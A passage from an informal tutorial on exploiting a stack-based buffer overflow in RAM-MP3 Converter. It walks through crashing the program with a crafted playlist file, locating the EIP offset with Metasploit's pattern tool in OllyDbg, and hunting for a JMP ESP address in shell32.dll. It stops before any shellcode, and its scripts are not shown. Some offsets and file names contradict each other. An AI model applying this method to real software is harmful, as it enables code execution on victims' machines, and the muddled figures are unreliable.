TRY HARDER: Exploit RAM-MP3 CONVERTER (Stack Based Overflows)

Let me say thanks for GOD "ALHAMDULILAH"

ok I will Explain How to Exploit RAM-MP3 CONVERTER.

1. we'll use the following simple perl script to create a .p3u file that may help us to discover more information about vulnerability :

root@justview:~# perl exploit.perl

copy the file into your xp and Load from RAM-MP3 CONVERTER and we can see that the application is error. after that wi try run RAM-MP3 CONVERTER using Ollydbg and see result:

This GUI shows the same information, but in a more…errr.. graphical way. In the upper left corner, you have the CPU view, which shows assembly instructions and their opcodes. (the window is empty because EIP currently points at 41414141 and that’s not a valid address).

2. we know that EIP is locate somewhere betwen 15000-20000 bytes from beginning of the buffer. Now, you could potentially overwrite all memory space between 15000 and 20000 bytes with the address you want to overwrite EIP with. This may work, but it looks much more nice if you can find the exact location to perform the overwrite. In order to determine the exact offset of EIP in our buffer, we need to do some additional work.

First, let’s try to narrow down the location by changing our perl script just a little :

Let’s cut things in half. We’ll create a file that contains 15000 A’s and another 5000 B’s. If EIP contains an 41414141 (AAAA), EIP sits between 20000 and 25000, and if EIP contains 42424242 (BBBB), EIP sits between 15000 and 20000.

root@justview:~# perl exploit.perl
copy result file into your windows and run the application using Ollydb and show result :

OK, so eip contains 42424242 (BBBB), so we know EIP has an offset between 15000 and 5000. That also means that we should/may see the remaining B’s in memory where ESP points at (given that EIP was overwritten before the end of the 20000 character buffer).

That is great news. We have overwritten EIP with BBBB and we can also see our buffer in ESP.

Before we can start tweaking the script, we need to find the exact location in our buffer that overwrites EIP.

In order to find the exact location, we’ll use Metasploit.

Metasploit has a nice tool to assist us with calculating the offset. It will generate a string that contains unique patterns. Using this pattern (and the value of EIP after using the pattern in our malicious .m3u file), we can see how big the buffer should be to write exactly into EIP.

Open the tools folder in the metasploit framework. You should find a tool called pattern_create.rb. Create a pattern of 5000 characters and write it into a file.

show result using kwrite

Edit the perl script and replace the content of $junk2 with our 5000 characters.

3. edit your script

copy result .mu3 into Windows and run RAM-MP3 CONVENTER using Olldydbg and it will show :

Look at Value of EIP and following my way :

result 2049

1094. That’s the buffer length needed to overwrite EIP. So if you create a file with 15000+2049 = 17049 A’s, and then add 4 B’s (42 42 42 42 in hex) EIP should contain 42 42 42 42. We also know that ESP points at data from our buffer, so we’ll add some C’s after overwriting EIP.

Let’s try. Modify the perl script to create the new m3u file.

copy result .mu3 into Windows and run RAM-MP3 CONVENTER using Olldydbg and it will show :

EIP 424242 or BBBB

We control EIP. So we can point EIP to somewhere else, to a place that contains our own code (shellcode). But where is this space, how can we put our shellcode in that location and how can we make EIP jump to that location ?

Remeber about JMP ESP at Exploit warftp ??
1. Run the application using Ollydb. on menu view choose sub menu Executale modules

2. will show executables modules

3. choose file library which serve as a springboard for the EIP register to enter the stack, and we will choose shell32.dll

4. after determine library, double click the file and then will show window new CPU from file library.